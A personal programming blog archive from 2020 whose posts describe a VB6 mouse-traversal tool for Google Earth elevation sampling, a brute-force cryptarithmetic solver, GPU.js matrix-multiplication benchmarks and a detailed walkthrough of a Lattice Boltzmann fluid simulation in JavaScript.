CodeWorth: 2020

Friday, December 18, 2020

PixelTraverser

I don't know if I should even be posting this program, given how niche a function it was designed to serve. Basically, it moves your mouse cursor around within a specified rectangular region of the screen. The idea was to create as many path points as possible within an area of interest on Google Earth, export them as a .kmz file, and feed that file to www.gpsvisualizer.com to get a .gpx file containing their elevation info. This elevation info was then to be used to make an interpolated elevation surface (TIN/DEM) in QGIS, which I had planned to use in HEC-RAS for my 2D rain-on-grid model. But it turns out the DEM so generated is worthless, at least that is what I've found as of this writing.

So, that was the whole point of the program. I made it just so that I didn't have to drag my mouse around manually for hours to get what I had assumed would be a reasonable number of points. It did help generate ~160,000 points over a catchment area of ~700 km² fairly quickly, but the DEM output was rather underwhelming, so I wasn't sure what actual purpose this program would serve, hence my hesitation to put it up here.
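The post doesn't say what path the cursor follows inside the rectangle. Purely as an illustration, the sketch below assumes a back-and-forth (boustrophedon) sweep at a fixed pixel spacing; `sweepPath` and its parameters are hypothetical names, and actually moving the cursor (which the VB6 program does) is left out.

```javascript
// Hypothetical sketch: cursor waypoints for a back-and-forth ("boustrophedon")
// sweep over a screen rectangle. The sweep pattern and the names here are
// assumptions; the actual VB6 PixelTraverser may move the cursor differently.
function sweepPath(left, top, width, height, spacing) {
  const points = [];
  let row = 0;
  for (let y = top; y <= top + height; y += spacing, row++) {
    const xs = [];
    for (let x = left; x <= left + width; x += spacing) xs.push(x);
    // Alternate direction on every row so the cursor never jumps back across.
    if (row % 2 === 1) xs.reverse();
    for (const x of xs) points.push({ x, y });
  }
  return points;
}

console.log(sweepPath(0, 0, 20, 10, 10));
// → (0,0) (10,0) (20,0), then (20,10) (10,10) (0,10)
```

For scale, ~160,000 points over ~700 km² averages out to about 229 points per km², i.e. roughly one point every 66 m (√(700,000,000 m² / 160,000) ≈ 66 m).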

At least I got to install Visual Studio 6 for Visual Basic 6 and write a meaningful(?) program for the first time in a long time. It certainly jogged old memories. Turns out, an installer for VB6/VS6 is very hard to come by on the internet now. It wasn't like this back in the day, ~10 or heck, even 5 years ago. I guess people have moved on from VB6. But it still feels so snappy and lightweight for what it can still do very well, unlike the more mainstream, feature-rich, often bloated IDEs of today. Or maybe it's just my 6-year-old laptop talking through me, I dunno. Here's a video of the thing in action for what it's worth:

Here's a screenshot of the program itself:

The project can be found on GitHub.

Tuesday, September 29, 2020

CryptArithmetic solver

It had been a while since I last made anything, so I took the opportunity to make a simple implementation of a CryptArithmetic problem solver in JavaScript. (Look it up on Google; there are tonnes of resources on the topic.) This kind of problem was brought to my attention by my brother, who has to study it as part of his AI course.

The implementation is pretty basic. There's nothing fancy going on here: no clever algorithm, just pure brute force. It makes a list of all the unique letters in the three words given to it. Then, it assigns random digits to them with no repetitions allowed, so there's a one-to-one correspondence between the letters and the digits. That is to say, each letter gets a unique digit that no other letter shares. A constraint is also imposed that no letter that begins any of the three words can be assigned 0. Then, the letter-digit assignment is used to construct numbers for all three words and the sum is checked. If it matches, great: the process is stopped and the solution is assumed to have been found. If not, the process continues with another set of random assignments until a timeout is reached. The number crunching itself is done in a Web Worker so as to keep the UI thread responsive. The UI is basic too. I even forgot to put in a textbox to specify the timeout, so that has to be done in code right now. That's all there is to it.
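Here is a minimal sketch of the random-assignment brute force described above, in plain JavaScript without the Web Worker. The function names are hypothetical, and a maximum number of tries stands in for the original's time-based timeout.

```javascript
// Random-assignment brute force for WORD1 + WORD2 = WORD3 (sketch; names are
// hypothetical, and maxTries stands in for the original's time-based timeout).
function uniqueLetters(words) {
  return [...new Set(words.join(""))];
}

// Read a word as a decimal number under the current letter -> digit mapping.
function wordValue(word, digitOf) {
  let value = 0;
  for (const ch of word) value = value * 10 + digitOf[ch];
  return value;
}

// Shuffle 0-9 (Fisher-Yates) and give each letter the next digit, so no two
// letters can ever share a digit.
function randomAssignment(letters) {
  const digits = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9];
  for (let i = digits.length - 1; i > 0; i--) {
    const j = Math.floor(Math.random() * (i + 1));
    [digits[i], digits[j]] = [digits[j], digits[i]];
  }
  const digitOf = {};
  letters.forEach((ch, k) => { digitOf[ch] = digits[k]; });
  return digitOf;
}

function solveRandom(a, b, sum, maxTries) {
  const words = [a, b, sum];
  const letters = uniqueLetters(words);
  if (letters.length > 10) return null; // more letters than digits
  const leading = [...new Set(words.map(w => w[0]))];
  for (let t = 0; t < maxTries; t++) {
    const digitOf = randomAssignment(letters);
    if (leading.some(ch => digitOf[ch] === 0)) continue; // no leading zeros
    if (wordValue(a, digitOf) + wordValue(b, digitOf) === wordValue(sum, digitOf)) {
      return digitOf;
    }
  }
  return null; // gave up, like hitting the timeout
}

// TO + GO = OUT has exactly one solution: 21 + 81 = 102.
console.log(solveRandom("TO", "GO", "OUT", 200000));
```

Random guessing can revisit the same assignment many times. For a puzzle with 8 distinct letters such as SEND + MORE = MONEY there are 10!/2! = 1,814,400 ordered digit choices, so with a single valid answer the expected number of random tries is about 1.8 million; enumerating permutations systematically would visit each assignment only once.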

Here's the GitHub repo and here's the demo

Tuesday, July 7, 2020

GPU based parallel computations in browser with GPU.js

I've been tinkering with General Purpose GPU (GPGPU) programming in JavaScript. The original motivation for this was to accelerate the compute-intensive LBM fluid simulation from my previous post.

This video was the launching pad for me towards in-browser GPGPU. It shows how the WebGL API can be used to leverage the massively parallel computational potential of graphics cards. WebGL, a web port of OpenGL if you will, was originally intended for graphics in the web browser, but it can be (ab)used for parallel general-purpose computations across the hundreds of cores you can expect in today's GPUs. I found out that there are a couple of options for GPGPU in JavaScript. By far the most popular is the GPU.js library, owing to its simplicity and the level of abstraction it provides.

There is the turbo.js library (if you can call it that; the source isn't much to look at), but I didn't know what to make of it: documentation is non-existent and there are only one or two examples. But maybe that's because it requires writing the kernel code in GLSL, and I don't know GLSL. (Kernel code is a piece of code that runs on all the cores of a GPU simultaneously, each instance typically operating on a different part of the same data structure, say different elements of an array, thus allowing for parallel computation.)

One of the cornerstones of GPGPU code (read: kernels), from what I've gathered, is that the same piece of code (the kernel) has to be able to access different parts of a data structure. GPU.js does this beautifully using this.thread.x for 1D array data, this.thread.x and this.thread.y for 2D array data, and this.thread.x, this.thread.y and this.thread.z for 3D array data. Each instance of the kernel code running on a GPU core is assigned different values for these variables. Hence, each kernel instance can operate on a different part of the given array at the same time.
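To make the thread-index idea concrete without a GPU, here is a CPU-only imitation of it. This is not GPU.js: `runKernel2D` is a hypothetical helper that calls the same kernel function once per output element, handing each call its own `this.thread.x` and `this.thread.y`. In GPU.js itself, such a function would instead be passed to `gpu.createKernel(...)` and sized with `.setOutput([width, height])`, and the calls would run in parallel.

```javascript
// CPU-only imitation of GPU.js's this.thread.{x,y} idea (not GPU.js itself):
// the same kernel function is called once per output element, and each call
// sees different thread indices through `this`.
function runKernel2D(kernel, width, height, ...args) {
  const out = [];
  for (let y = 0; y < height; y++) {
    const row = [];
    for (let x = 0; x < width; x++) {
      // On a GPU these calls would run in parallel; here they run one by one.
      row.push(kernel.call({ thread: { x, y, z: 0 } }, ...args));
    }
    out.push(row);
  }
  return out;
}

// Matrix-multiplication kernel in the same style: each "thread" computes one
// output element c[y][x] from row y of a and column x of b.
function multiplyKernel(a, b, n) {
  let sum = 0;
  for (let i = 0; i < n; i++) {
    sum += a[this.thread.y][i] * b[i][this.thread.x];
  }
  return sum;
}

const a = [[1, 2], [3, 4]];
const b = [[5, 6], [7, 8]];
console.log(runKernel2D(multiplyKernel, 2, 2, a, b, 2)); // → [[19, 22], [43, 50]]
```

The kernel must be a regular `function`, not an arrow function, so that `this` can be bound to the per-call thread object.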

GLSL is a language for writing shaders (a fancy term for kernel code, but used in graphics operations). Maybe I was unwilling to go too deep into the topic, but a few Google searches didn't turn up a similar construct in GLSL, and hence in turbo.js. Maybe that's how things go for a shading language (maybe a GLSL kernel instance doesn't need to know which core it is running on), or maybe not, I don't know. So, after emailing the author of turbo.js with similar inquiries in hopes of some resolution, I just stuck with GPU.js.

Apart from these two libraries, there seem to have been a couple more attempts at providing GPGPU functionality on top of WebGL, namely WebCLGL.js and WebMonkeys, as I found out in this excellent article titled General-Purpose Computation on GPUs in the Browser Using gpu.js, but I didn't bother with them. All but GPU.js seem to be dead, discontinued, or unable to garner much attention.

GPU.js is great: kernel code can be written in JavaScript, it has nice abstractions and conveniences, relatively good documentation and great examples, it seems to be in (active?) development, it seems to have more users and all that. But there are still some issues that I ran into without much tinkering. One of these is about large loops in kernels. Whenever there are more than 1100 or so iterations, on my PC at least, the code fails and returns all zeroes. A code example in the documentation in the project's GitHub repo reads as follows:

The above code is for multiplication of two square matrices a and b, each of size 512. If the size of the matrices is increased to anything greater than ~1100, the code fails (at least on my computer), as I described before. There is a GitHub issue regarding this exact problem. Apparently it has to do with the way 'loop unrolling' is done by the (graphics?) driver.

One way to deal with it, according to the discussion in the GitHub issue, seems to be to break the loop up into smaller loops. I tried that myself but didn't get it to work. So, I had to divide the matrices into blocks of smaller matrices (a process known as partitioning) and operate on each block as if it were an element of the original matrices. That worked. Now I could do a 2000x2000 matrix multiplication using a block size of 1000 and GPU.js wouldn't give me all zeroes. Hooray!
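Here is a CPU-only sketch of the partitioning idea in plain JavaScript. It makes no GPU.js calls, and `multiplyBlocked` and `blockSize` are illustrative names. The output is built up block by block, and each block product only loops over at most `blockSize` entries. That cap is presumably what keeps a kernel's loop under the ~1100-iteration limit when the block product is the part done on the GPU.

```javascript
// Blocked (partitioned) matrix multiplication on the CPU, as a sketch of the
// partitioning idea. Each (bi, bj) output block accumulates the products of
// blockSize x blockSize sub-blocks, so no inner loop runs longer than blockSize.
function multiplyBlocked(a, b, blockSize) {
  const n = a.length;
  const c = Array.from({ length: n }, () => new Array(n).fill(0));
  for (let bi = 0; bi < n; bi += blockSize) {
    for (let bj = 0; bj < n; bj += blockSize) {
      for (let bk = 0; bk < n; bk += blockSize) {
        // c[block bi,bj] += a[block bi,bk] * b[block bk,bj]
        const iEnd = Math.min(bi + blockSize, n);
        const jEnd = Math.min(bj + blockSize, n);
        const kEnd = Math.min(bk + blockSize, n); // last block may be smaller
        for (let i = bi; i < iEnd; i++) {
          for (let j = bj; j < jEnd; j++) {
            let sum = 0;
            for (let k = bk; k < kEnd; k++) sum += a[i][k] * b[k][j];
            c[i][j] += sum;
          }
        }
      }
    }
  }
  return c;
}

console.log(multiplyBlocked([[1, 2], [3, 4]], [[5, 6], [7, 8]], 1)); // → [[19, 22], [43, 50]]
```

The block size doesn't have to divide the matrix size evenly; the `Math.min` bounds simply make the last block in each direction smaller.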

Now some benchmarks on my computer:

10x10 matrix: CPU - 0 ms | GPU - 500 ms

100x100 matrix: CPU - 7 ms | GPU - 1,200 ms

256x256 matrix: CPU - 128 ms | GPU - 2,700 ms

512x512 matrix: CPU - 2,200 ms | GPU - 3,000 ms

750x750 matrix: CPU - 9,400 ms | GPU - 3,200 ms

1000x1000 matrix: CPU - 25,000 ms | GPU - 5,000 ms

2000x2000 matrix: CPU - 224,000 ms | GPU - 40,000 ms (using a block size of 1000; smaller block sizes take more time since fewer computations are then done in parallel)

It goes without saying that this is not the most optimized matrix multiplication program out there, not by a long shot, and the way partitioning is achieved here has a big say in how the algorithm performs for larger matrices (the jump from 5,000 to 40,000 ms in going from a matrix size of 1000 to 2000 looked whopping and rather disappointing, although an 8x increase is roughly what the n³ operation count of matrix multiplication predicts when n doubles; the CPU time went up by about 9x). Still, matrix multiplication seems to be the de facto hello-world program in parallel-computation land.

That's it for this post. I just wanted to share my experience with this amazing piece of technology and the kind of difference it can make versus the CPU in a variety of parallelizable tasks that go far beyond the simple matrix multiplication problem.

Here's the code I used for the benchmarks.

P.S. My browser (Firefox Developer Edition version 79.0b4 64-bit) seems to use my integrated Intel HD Graphics (GPU0) and not my dedicated AMD Radeon R7 M265 (GPU1). I don't know if there's a way to change that.

Tuesday, June 30, 2020

Fluid Simulation using Lattice Boltzmann Method

TL;DR
This is a Lattice Boltzmann fluid simulation implemented in (unoptimized) JavaScript. Graphics is handled using the p5.js library and the lodash library is used for deep cloning an array of objects. A short clip showing a planar obstacle shedding vortices is presented below:

Here's the link to the project and here's the live demo.

The details:

I'd been watching Prof. Patrick Winston's MIT OpenCourseWare lectures on Artificial Intelligence last month or so. As a result, I started searching for related stuff on YouTube, Coursera, edX and the like. In the process, bombarded by recommendations and suggestions from these sites on a great breadth of subjects, I got interested in simulating (and visualizing) physical processes, often represented by differential equations. I'm not totally certain why I gravitated towards it, but it's probably because of how accessible it seemed at the time, aside from the obvious reason of it being a field very familiar to me. Also, it had been a while since I had written code; I guess I wanted a hit. So, I started with the 3-body problem. That was trivial to implement, and it was done and dusted in a matter of hours. Then I went on to the 1-D heat/diffusion equation. While the Finite Difference implementation of the PDE was simple enough to be worked out on a spreadsheet, I really enjoyed the insightful conservation-law-based derivation that took me down a rabbit hole of transport phenomena.
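The post doesn't show which finite-difference scheme was used. One common choice, and the kind of update that fits naturally into spreadsheet columns, is the explicit forward-time centred-space (FTCS) step sketched below. This is an assumption for illustration: `heatStep` is a hypothetical name, both end values are held fixed, and `r` stands for αΔt/Δx².

```javascript
// Explicit (FTCS) finite-difference step for the 1-D heat equation
// du/dt = alpha * d2u/dx2, with both end values held fixed.
// r = alpha*dt/dx^2 must not exceed 0.5, or the explicit scheme blows up.
function heatStep(u, r) {
  if (r > 0.5) throw new RangeError("r = alpha*dt/dx^2 must be <= 0.5");
  const next = u.slice(); // ends keep their values (fixed-temperature boundaries)
  for (let i = 1; i < u.length - 1; i++) {
    // New value = old value + r * (discrete second derivative)
    next[i] = u[i] + r * (u[i + 1] - 2 * u[i] + u[i - 1]);
  }
  return next;
}

console.log(heatStep([0, 0, 1, 0, 0], 0.25)); // → [0, 0.25, 0.5, 0.25, 0]
```

Each new value depends only on the previous row's three neighbouring values, which is why the same formula can be dragged across spreadsheet cells.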

After my interest in the heat equation faded, I turned towards the Navier-Stokes equations. After all, they were in the same class of problems as the heat equation, only more universal, and if I could simulate the NS equations, I would be able to make some cool-looking fluid animations. After tinkering around some, I found out to my disappointment that the pressure term had no obvious solution. This shoved me into another engrossing journey. For the supposed civil engineer that I am, it was embarrassing that I had no idea that simulating the Navier-Stokes equations was in itself a huge, distinct field, owing in part to the difficulty arising from the pressure term; I should've known at least that much. Many YouTube and Google searches went into understanding some of the workarounds people have come up with over the years; vorticity-streamfunction and artificial compressibility methods are the two I remember. NPTEL's course on Computational Fluid Dynamics was really helpful. Sure, I understood better what beast I was dealing with, but the deeper you dig, the darker the abyss looks. I just knew there were going to be a lot of headaches down the road. Supposedly, one had to use a staggered grid to avoid numerical instabilities, and I didn't know what that was going to look like in code. Then there were the complications that boundary conditions, both at obstacles in the flow and at the edges of the computational domain, could pose. And all that trouble would be for naught if the computation proved too CPU-intensive to run a simple demonstration on a regular PC. Though I gave up on the idea, I did finally learn here what on earth I'd been taught about modelling the Debris Flow phenomenon in the Water Induced Hazards curriculum of Water Resources Engineering. Terms such as 'upwind scheme', 'staggered grid', and 'vector and scalar points' made a lot more sense after this. I wish I'd been given more explanation regarding the matter in class.
It's amazing how the internet doesn't really give you an easy answer for whatever you throw at it. Niche topics have niche search results, no matter how close they actually are to a wildly popular counterpart. Anyway, I did get to know the modern fluid-simulation scene from the experience. I learned that creating physically accurate fluid models for real-life engineering and scientific tasks takes a lot of computational effort and rigor, and that simulation purely for visual appeal in computer graphics has been figured out fairly recently: Jos Stam's approach comes to mind. The derivation of the NS equations, and one approach to simulating them, also taught me a few things about vector fields and linear algebra, such as the now-obvious-seeming Helmholtz decomposition theorem.

Anyway, after my exploration of the NS equations, the magic of the internet gently pushed me towards another way to do fluid simulations. Enter the Lattice Boltzmann Method. This technique doesn't bother with the NS equations at all. Instead of trying to discretize and solve a PDE for the macroscopic variables, velocity and pressure, LBM works from the bottom up. It recognizes that continuous-seeming macroscopic properties emerge out of microscopic molecular activity. So LBM, it seems, is based on kinetic theory and statistical mechanics. Now, statistical mechanics isn't something I studied in university, so it's not a subject I'm comfortable working with, but upon typing the term "Lattice Boltzmann simulation" into YouTube, I saw numerous videos that made it seem so easy to simulate a flowing fluid. I thus set out to implement my own version of LBM. There was a lot of good content on the internet, from YouTube videos to free online courses on Coursera. I also referred to multiple books and texts on the subject. Among them, the Coursera course on Simulation and Modeling of Natural Processes from the University of Geneva; the books [ a) Lattice Boltzmann Modeling: An Introduction for Geoscientists and Engineers by Michael C. Sukop and Daniel T. Thorne, b) The Lattice Boltzmann Method: Principles and Practice by Timm Krüger, Halim Kusumaatmaja et al., c) A Practical Introduction to the Lattice Boltzmann Method by Alexander J. Wagner, and d) Review of Boundary Conditions and Investigation Towards the Development of a Growth Model: a Lattice Boltzmann Method Approach (Doctoral Thesis) by Albert Puig Aranega ]; and a classroom handout (I believe) and a live simulation webpage by Prof. Dan Schroeder of Weber State University at http://physics.weber.edu/schroeder/fluids/ proved to be extremely valuable in this project.
With the help of these resources, among others, I also acquired a bird's-eye view of LBM and the fluid simulation scene as a whole. There was the top-down approach of discretizing the NS equations; there was the completely microscopic viewpoint of molecular dynamics, which requires simulating and tracking the motions of an unimaginably humongous number of molecules to be of any practical use for dense fluids such as water (particle methods such as Smoothed Particle Hydrodynamics instead track fluid parcels rather than individual molecules); and there was LBM, a compromise between the macroscopic and the microscopic treatment of fluid motion, the so-called "mesoscopic" approach. While a complete description of LBM is obviously not possible in a simple blog post such as this, as must be evident from the books on the topic I've mentioned above, I will try to summarize how I implemented it in code.

In the Lattice Boltzmann Method, space is divided up into 'lattice points'. Depending on how many dimensions you want to work with, LBM can be 1D, 2D or 3D. This project is a 2D LBM implementation, so the XY plane is used as the simulation domain. The program I've written explicitly draws a regular grid of square cells, with a specified number of rows and columns, on the plane. The centroids of the cells so formed are taken as the lattice points to be assigned properties according to LBM. Note that this definition of a lattice point as the centroid of a cell is completely arbitrary; what matters is that their ordering (and, if visualization is important, their spacing as well) be respected. LBM, from what I've understood working on this project, doesn't have a built-in assumption about the nature of lattice points; that is implementation-specific. Now, each lattice point, according to 2D Lattice Boltzmann, is given a particle distribution for each of 9 directions (this is called the D2Q9 scheme): Rest, Eastbound, Northbound, Westbound, Southbound, NorthEastbound, NorthWestbound, SouthWestbound and SouthEastbound. Noting the use of the term 'particle distribution', as opposed to individual particles, partly explains why LBM is called a 'mesoscopic' approach. Each of these distributions is assigned a direction vector pointing from the lattice point to itself (for the rest population) or to one of its eight neighbors. In simpler terms, the aforementioned particle distributions are assigned the direction vectors [0,0], [1,0], [0,1], [-1,0], [0,-1], [1,1], [-1,1], [-1,-1] and [1,-1], in that order. In most of the literature, the particle distribution (a scalar) is represented as f with a subscript denoting its direction, and the direction vector is represented as e with the same subscript, the subscript running from 0 to 8 for the nine directions. Besides these quantities, there are also the so-called weights, denoted w, associated with each direction.
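Here are the D2Q9 constants written out in the direction order used in this post (0 rest, 1 E, 2 N, 3 W, 4 S, 5 NE, 6 NW, 7 SW, 8 SE). The array names `E`, `W` and `OPP` are illustrative. The table of opposite directions is an addition that comes in handy for bounce-back.

```javascript
// D2Q9 lattice constants, in the order used in this post:
// 0 rest, 1 E, 2 N, 3 W, 4 S, 5 NE, 6 NW, 7 SW, 8 SE.
const E = [
  [0, 0], [1, 0], [0, 1], [-1, 0], [0, -1],
  [1, 1], [-1, 1], [-1, -1], [1, -1],
];
// Weights: 4/9 for rest, 1/9 for the axis directions, 1/36 for diagonals.
const W = [4 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 36, 1 / 36, 1 / 36, 1 / 36];

// Index of the opposite direction, needed for bounce-back (e.g. NE <-> SW).
const OPP = E.map(([ex, ey]) => E.findIndex(([fx, fy]) => fx === -ex && fy === -ey));

console.log(OPP); // → [0, 3, 4, 1, 2, 7, 8, 5, 6]
```

A quick way to see why these particular weights are used: they sum to 1, the weighted direction vectors cancel out, and the weighted second moment Σ wᵢ eᵢₓ² comes out to exactly 1/3 in both x and y, which is the squared lattice speed of sound when c = 1.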

The basic idea in the Lattice Boltzmann Method is that the particle populations at all the lattice sites undergo two steps: streaming/propagation and collision/relaxation. Streaming emulates the transfer of properties throughout the fluid, whilst collision approximates the tendency of the fluid to equilibrate (read: settle down). The heart and soul of this treatment is statistical mechanics, as I mentioned before, and the so-called Lattice Boltzmann Equation, aka LBE in the literature. The motivation for the streaming step may be obvious if we are to have any chance at emulating a transport phenomenon where properties such as velocity and density are pushed around, but the collision step may warrant a short explanation. If oversimplification is no concern, the motivation for collision is basically that distributions further away from their equilibrium values are gradually shifted towards equilibrium. This is why this step is also called the relaxation phase: properties that are away from the norm ease into their equilibrium values. From a molecular perspective, collisions between molecules do push the overall state of the system towards equilibrium and a state of homogeneity/isotropy.

Streaming just transfers one cell's particle populations/distributions to its appropriate neighbors. 'Appropriate' here captures the rather intuitive way in which a cell streams its particles to its eight neighboring cells: the Eastbound particle distribution f₁ replaces the eastern neighbor's Eastbound particle distribution, and so on for all eight directions; the rest population f₀ is not streamed anywhere. This is done for all the cells in the grid, but you have to be careful not to overwrite information in a neighboring cell that still needs to be streamed from that cell to its own neighbors. So what is typically done is that two copies of the grid's cells, with all their information, are kept, and one copy is updated with streamed information from the other, which remains unchanged throughout the process. This is important because streaming is supposed to be a simultaneous process. What I've just described is for interior cells (I've been using the terms cell and lattice point interchangeably), meaning cells whose neighbors are all actual fluid cells. Here, I should explain what a fluid cell is versus a non-fluid cell. In real life, you'll want to see how a fluid flows around an obstacle, so we need a way to represent barriers that do not allow flow to pass. What is typically done is that the grid cells that are supposed to be obstacles are marked in some way; if you implemented a cell as a class, you could give it a descriptive property, say a boolean variable called isSolid. Anyway, however you implement it in code, you know which cell is fluid and which isn't. Any cell surrounded by actual fluid cells (with isSolid set to false, say) is an interior cell, and the aforementioned process of streaming holds good. But if any of its neighboring cells is a solid cell (an obstacle), you perform a so-called 'bounce-back'.
It is pretty simple: a streaming cell that encounters a solid neighbor gets back the same particle distribution, but in the opposite direction. If a cell undergoing streaming has a solid northeast neighbor, then upon streaming its northeastbound particles f₅ towards it, the streaming cell itself gets its southwestbound distribution f₇ replaced by the value of the f₅ it was trying to stream. The neighboring solid cell doesn't undergo any change, as should be obvious. Hence the term bounce-back. There seem to be two versions of the bounce-back approach to solid boundaries, namely full bounce-back and halfway bounce-back, but at its simplest, this is how it works, and indeed how it's implemented in my code. It is worth pointing out that the bounce-back boundary translates to the macroscopic no-slip condition of fluid flow.
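The sketch below shows streaming with simple bounce-back, written in the "pull" form, where each fluid cell gathers from its neighbors. It uses assumptions of its own: `f[y][x]` is a plain array of 9 distributions in the D2Q9 order above, `y` grows northward, and for brevity the grid wraps around in both x and y (the post's fixed inlet and copied outlet columns are not modeled here). `stream` is a hypothetical name.

```javascript
// Pull-style streaming with simple bounce-back (sketch, hypothetical names).
// f[y][x] is an array of 9 distributions; solid[y][x] marks obstacles.
// The grid wraps around in both x and y here, purely to keep the sketch short.
const E = [[0, 0], [1, 0], [0, 1], [-1, 0], [0, -1], [1, 1], [-1, 1], [-1, -1], [1, -1]];
const OPP = [0, 3, 4, 1, 2, 7, 8, 5, 6];

function stream(f, solid) {
  const ny = f.length, nx = f[0].length;
  // Write into a fresh copy so no value is overwritten before it is read.
  const next = f.map(row => row.map(cell => cell.slice()));
  for (let y = 0; y < ny; y++) {
    for (let x = 0; x < nx; x++) {
      if (solid[y][x]) continue; // solid cells are left untouched
      for (let i = 1; i < 9; i++) { // i = 0 (rest) stays where it is
        // The population arriving here in direction i left from (x - ex, y - ey).
        const sx = (x - E[i][0] + nx) % nx;
        const sy = (y - E[i][1] + ny) % ny;
        next[y][x][i] = solid[sy][sx]
          ? f[y][x][OPP[i]] // bounce-back: our own population that hit the wall, reversed
          : f[sy][sx][i];
      }
    }
  }
  return next;
}
```

Every population in a fluid cell ends up in exactly one place, either in the neighbor it was heading for or reflected back into its own cell, so the total mass over the fluid cells is unchanged by a streaming step.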

Now, onto the collision step. Collision, in the broadest sense an easing into some kind of equilibrium, has a number of different approaches. The simplest of these seems to be the BGK (Bhatnagar-Gross-Krook) collision operator, which works as follows. You calculate the equilibrium particle distributions f_i^eq for all nine directions (i = 0 to 8) using an expression derived, it seems, from the Maxwell-Boltzmann distribution of particle velocities. No further knowledge of the actual physics of this particular distribution is required to implement it in code. The expression is as follows:

$$f_i^{eq} = w_i\,\rho\left[1 + \frac{3\,(\mathbf{e}_i\cdot\mathbf{u})}{c^2} + \frac{9\,(\mathbf{e}_i\cdot\mathbf{u})^2}{2c^4} - \frac{3\,(\mathbf{u}\cdot\mathbf{u})}{2c^2}\right]$$

Here, the weights w_i are the constants 4/9 for i=0 (rest direction), 1/9 for i=1,2,3,4 (E,N,W,S) and 1/36 for i=5,6,7,8 (NE,NW,SW,SE). If I understand correctly, these values are what they are so that mass and momentum are conserved in collisions and the lattice behaves the same in every direction. Density ρ is the cell's density, calculated as:

$$\rho = \sum_{i=0}^{8} f_i$$

c is the lattice speed, one lattice spacing per time step, and is usually taken as unity (the lattice speed of sound is then c/√3 ≈ 0.577). The vector e_i is the direction vector for direction i, as mentioned a few paragraphs above, i.e. [0,0], [1,0], [0,1] and so on. The vector u is the actual velocity vector of the cell, calculated as:

$$\mathbf{u} = \frac{1}{\rho}\sum_{i=0}^{8} f_i\,\mathbf{e}_i$$

After the equilibrium particle distributions f_i^eq have been calculated for all nine directions, the relaxation equation given by BGK is used:

$$f_i = f_i + \omega\left(f_i^{eq} - f_i\right)$$

Here, ω is the relaxation parameter (the inverse of the relaxation time), which has to lie between 0 and 2; it sets the fluid's viscosity through ν = (1/ω − 1/2)/3 in lattice units. If the multiple f_i terms look confusing, all this equation means is that you evaluate the right-hand side and update the value of f_i for each direction i.
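Here is a minimal sketch of the equilibrium, density and velocity expressions described above, plus the BGK update for a single cell. It assumes c = 1 and stores the distributions as a plain 9-element array in the D2Q9 order used in this post. The function names and `omega` (the relaxation parameter between 0 and 2) are illustrative.

```javascript
// D2Q9 equilibrium and BGK collision for one cell, with c = 1 (sketch).
const E = [[0, 0], [1, 0], [0, 1], [-1, 0], [0, -1], [1, 1], [-1, 1], [-1, -1], [1, -1]];
const W = [4 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 36, 1 / 36, 1 / 36, 1 / 36];

// Density and velocity from the distributions: rho = sum f_i, u = sum f_i e_i / rho.
function macroscopic(f) {
  let rho = 0, mx = 0, my = 0;
  for (let i = 0; i < 9; i++) {
    rho += f[i];
    mx += f[i] * E[i][0];
    my += f[i] * E[i][1];
  }
  return { rho, ux: mx / rho, uy: my / rho };
}

// f_i^eq = w_i rho [1 + 3 e.u + 4.5 (e.u)^2 - 1.5 u.u]
function equilibrium(rho, ux, uy) {
  const uSq = ux * ux + uy * uy;
  return E.map(([ex, ey], i) => {
    const eu = ex * ux + ey * uy;
    return W[i] * rho * (1 + 3 * eu + 4.5 * eu * eu - 1.5 * uSq);
  });
}

// BGK relaxation, in place: f_i = f_i + omega * (f_i^eq - f_i).
function collide(f, omega) {
  const { rho, ux, uy } = macroscopic(f);
  const feq = equilibrium(rho, ux, uy);
  for (let i = 0; i < 9; i++) f[i] += omega * (feq[i] - f[i]);
  return f;
}

// Inlet-style use: the distributions for rho = 1, u = (0.1, 0).
const inlet = equilibrium(1, 0.1, 0);
console.log(macroscopic(inlet)); // rho ≈ 1, ux ≈ 0.1, uy ≈ 0 (up to round-off)
```

Because the equilibrium has the same density and momentum as the distributions it was built from, collision leaves ρ and u unchanged and only reshuffles the populations among directions. With omega = 1.9, for instance, the lattice viscosity would be (1/1.9 − 0.5)/3 ≈ 0.0088.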

Okay, having explained the working equations of the collision operation, it is important to observe that collision is a wholly local process, i.e. no neighboring cell's information is used. Sure, the particle distributions will change over time because every fluid cell streams to its neighbors, thus changing the macroscopic density and velocity, but the collision itself depends only on the cell's current properties.

That's all about the two steps of the LBM algorithm. But there's still an important aspect left to explain: domain boundaries. Since we're only simulating a small region of space, we must specify how the fluid behaves at the interfaces: the top, bottom, left and right boundaries. Usually, we want these to be open boundaries for a freely flowing fluid. More often than not, the left boundary is the inlet through which fluid flows into our system. As such, it makes sense to hold the inlet column of cells at particle distributions whose macroscopic parameters, density and velocity, amount to constants of our choosing. In my code, I've set the incoming fluid's density to 1 and the velocity to something lower than or equal to 0.3. LBM seems to be unable to cope with velocities approaching the lattice speed of sound (c/√3 ≈ 0.577 with c taken as 1, and the equilibrium expression is only accurate well below it), so anything over 0.3 is liable to render the simulation unstable. So, the first column of fluid cells is constrained to a constant velocity and density, meaning it is not streamed into. The way to calculate these particle distributions is to use the first expression, the one for f_i^eq. We calculate f_i^eq for all the directions for our choice of velocity and density, assign the values to the inlet cells, and never modify those distributions afterwards. Information flows from these cells, not to them.

Then there's the last column of cells. We can do one of two things here: impose either a so-called 'periodic boundary' or a 'static boundary' (I made this term up, dunno if there's an actual one; it seems to be what is usually called a zero-gradient or outflow boundary). In the static boundary approach, we assign to the last column of cells, the outlet cells, the values of the cells immediately to their left. (By now you know that whenever I talk about values, I mean the particle distributions f_i.) This pretends that the flow properties no longer vary between the columns of cells near the outlet, as if they were infinitely far from whatever obstacles our system may have. The alternative is a 'periodic boundary', where our code pretends that the column immediately to the right of the outlet cells is in fact our first column of cells, that is, the domain loops from back to front. In this case, the inlet column would in fact be streamed into from the last column and so on, as if it were no different from any other column of interior cells. When I tried this, the simulation was way too unstable for my taste, so I stuck to the static boundary approach.

Now for the top and bottom boundaries, the most common approach is to apply the periodic boundary to them both so that the top wraps back to the bottom row of cells when they try to stream to the cells above and vice versa for the bottom row of cells. And this is what I did in my code.

As far as the initial conditions are concerned, each cell may be initialized with the particle distribution corresponding to the required inflow velocity OR to zero velocity. I've found better results when initializing with the inflow velocity.

